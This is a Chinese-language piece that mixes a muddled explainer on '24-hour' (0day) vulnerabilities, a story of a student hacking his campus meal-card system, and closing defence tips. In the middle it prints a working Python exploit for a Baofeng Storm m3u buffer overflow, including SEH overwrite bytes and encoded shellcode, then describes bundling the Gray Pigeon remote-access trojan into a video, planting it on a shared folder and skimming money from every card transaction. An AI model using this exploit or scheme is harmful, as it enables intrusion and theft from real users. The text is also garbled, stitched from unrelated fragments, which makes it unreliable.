24小时漏洞是一种未知的漏洞,通常在软件发布后立即出现,并且非常难以防范。
攻击者可以通过利用24小时漏洞来攻击用户,从而获得未经授权的访问权限或破坏系统安全。
在实际情况中,24小时漏洞往往被用于进行网络攻击。
因此,对于企业机构来说,预防和应对24小时漏洞安全事件是非常重要的。
这包括使用最新的安全防护技术、定期更新软件补丁、加强员工安全意识培训等措施。
挖掘24小时漏洞需要极高的技术能力,和一些运气。
大学生活就是吃了睡,睡醒了上课,上完课回寝室玩电脑。
食堂早餐提供馒头,包子,面条。
午餐,晚餐是各种炒菜。
支付使用学校自己安装的ic卡。
使用前需要到指定地点充值,并且充值任何金额都没有优惠。
准备大学生数学建模竞赛的时候,经常早出晚归,待在计算机房里面。
错过了给ic卡充值的时间。
只能到外面的餐馆吃饭了。
一边吃饭,一边刷手机的时候,看到新闻。
一名银行负责网络维护的员工,突发奇想,编写了一个将每个用户上面的一分钱转移到自己账户上的程序。
人们很少注意,账户上几分钱的变化。
开始的一段时间,“一分钱行动”很成功。
但是一天一名退休的教师到银行投诉,自己的账户少了一分钱。
银行仔细的核对后,发现了潜藏在内部的“贼”。
这才使偷储户钱的行为被曝光。
这个新闻启发了赵南北。
“可以在每次刷卡的时候,自动向我的账户转账0.009元钱!”赵南北想好了自己的谋划。
Ic充值的地方是在食堂正门的位置。
充值的工作人员,是一名年轻活力的女孩子。
充值的电脑不能连接互联网,只能连接校园的局域网。
为了丰富校园的生活。
学校的局域网上,设置了一个影视剧的共享文件夹。
里面有各种最新的电影,电视剧,综艺节目。
需要先下载到本地电脑,再用电脑里面的播放器播放。
负责充值的女孩子,很喜欢韩国的综艺节目。
在充值的时候,一边看综艺节目,一边充值。
使用的是暴风影音播放器。
暴风影音正好被纰漏了24小时漏洞。
#!\/usr\/bin\/env python
#################################################################
#
# title: baoFeng Storm m3U File processing buffer overflow Exploit
# cNVd-Id: cNVd-2010-00752
# Author: Lufeng Li and qingshan Li of Neusoft corporation
# download:
# test: put m3u file in root(e.g. c:\/ d:\/),and open this m3u file
# platform: windows xpSp3 chinese Simplified
# Vulnerable: Storm2012 3.10.4.21
# Storm2012 3.10.4.16
# Storm2012 3.10.4.8
# Storm2012 3.10.3.17
# Storm2012 3.10.2.5
# Storm2012 3.10.1.12
#################################################################
# code :
file\\u003d \\\"baofeng.m3u\\\"
junk \\u003d\\\"\\\\x41\\\"*795
nseh\\u003d\\\"\\\\x61\\\\xe8\\\\xe1\\\"
seh\\u003d\\\"\\\\xaa\\\\xd7\\\\x40\\\"
jmp \\u003d\\\"\\\\x53\\\\x53\\\\x6d\\\\x58\\\\x6d\\\\x05\\\\x11\\\\x22\\\\x6d\\\\x2d\\\\x10\\\\x22\\\\x6d\\\\xac\\\\xe4\\\"
nops \\u003d\\\"\\\\x42\\\" * 110
shellcode\\u003d(\\\"ppYAIAIAIAIAqAtAxAZApA3qAdAZA\\\"
\\\"bARALAYAIAqAIAqApA5AAApAZ1AI1AIAIAJ11AIAIAxA\\\"
\\\"58AApAZAbAbqI1AIqIAIqI1111AIAJqI1AYAZbAbAbAb\\\"
\\\"Ab30Apb944JbKLK8U9m0m0KpS0U99UNq8RS44KpR004K\\\"
\\\"22LLdKR2md4KcbmxLoGG0Jo6NqKop1wpVLoLqqcLm2NL\\\"
\\\"mpGq8oLmm197K2Zp22b7tK0RLptK12oLm1Z04Kopbx55\\\"
\\\"Y0d4oZKqxp0p4KoxmhtKR8mpKqJ3ISoL19tKNttKm18V\\\"
\\\"NqKoNq90***q8oLmKqY7NxK0t5L4m33mKhoKSmNd45Jb\\\"
\\\"R84K0xmtKqhSbFtKLL0KtK28mLm18S4KKt4KKqxpSYot\\\"
\\\"NdmtqKqK311IqJpqKoYpqhqopZtKLRZKSVqm2JKqtmSU\\\"
\\\"89KpKpKp0pqx014K2o4GKohU7KIpmmNJLJqxEVdU7mEm\\\"
\\\"KohUoLKVcLLJSpKKIpt5LEGKq7N33bRo1ZKp23KoYERc\\\"
\\\"qq2LRcm0LJA\\\")
fobj\\u003dopen(file,\\\"w\\\")
payload\\u003djunk+nseh+seh+jmp+nops+shellcode
fobj.write(payload)
fobj.close 漏洞 触发过程分析
windbg 附加 Storm.exe进程,并下ReadFile函数断点
命令:bu kernel32!ReadFile
把m3u格式的poc文件拖入到Storm窗口中,程序在ReadFile中断了下来,跳出函数来到
代码:
.text: ; \\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d S U b R o U t I N E \\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d\\u003d
.text:
.text: ; Attributes: bp-based frame
.text:
.text: ; int __cdecl sub_(LpcwStR lpFileName)
.text: sub_ proc near ; codE xREF: sub_Fcb+32p
导致堆栈溢出直接,可执行程序就被启动了。
赵南北将“灰鸽子”捆绑到韩国的综艺视频,之后上传到共享网盘。
在校园的论坛上发出下载地址的帖子。
论坛管理员看到后,下载完视频,之后再传到共享文件夹当中。
一切都很顺利,就等着充值的美女启动了。
第二天中午的时候,连接校园网的赵南北的电脑上出现了,灰鸽子上线的提醒。
进入充值的电脑后,可以同屏看到充值的全过程。
在午餐结束后,充值电脑进入了待机状态。
证明电脑的屏保已经启动了。
通过远程控制,赵南北将充值的软件复制到自己的电脑。
经过一晚上的分析。
赵南北编写了一个计费的算法。
每个账户,每笔交易时,自动向赵南北的饭卡转入0.009元钱。
由于食堂刷卡器的屏幕只能显示小数点后的两位。
打饭的同学看不到0.009元的变化。
保证了计划的成功。
将病毒程序传回到充值电脑,设置为开机启动。
赵南北的校区有6000多人,饭卡每天可预计的到账金额在200元左右。
200元足够每天在校园内奢侈地消费了。
以下是一些防御24小时安全事件的建议:
1. 培训员工了解24小时漏洞的威胁,并教育他们如何识别和避免这些威胁。例如,不要随意点击电子邮件中的链接或附件,以及定期更新软件补丁等。
2. 使用安全监控工具,实时监测网络流量和异常活动,以发现和阻止0day攻击。这些工具可以帮助识别异常行为,如未经授权的访问尝试、数据泄露等。
3. 使用虚拟化技术来隔离关键网络资源和数据,以减少24小时漏洞的影响。例如,在同一网段中使用虚拟局域网技术将一些重要的网络设备隔离,将面向互联网的网络服务器放到一个单独的非军事化区域,以减少对内部网络的影响。
4. 使用内存保护技术,如内存访问行为监控模块、cpU指令监控模块等,对内存读写、执行行为进行监控,以实时检测和阻止0day攻击。
5. 确保所有软件都是最新版本,并且及时更新补丁以修复已知漏洞。这可以帮助减少被0day攻击的风险。
6.建立一个网络攻击事件响应计划,明确应对0day攻击的流程和责任。这可以帮助快速识别和应对攻击,将影响范围和损失控制在最低限度。
7. 定期备份关键数据和系统,以便在发生24小时漏洞时能够快速恢复,减少损失。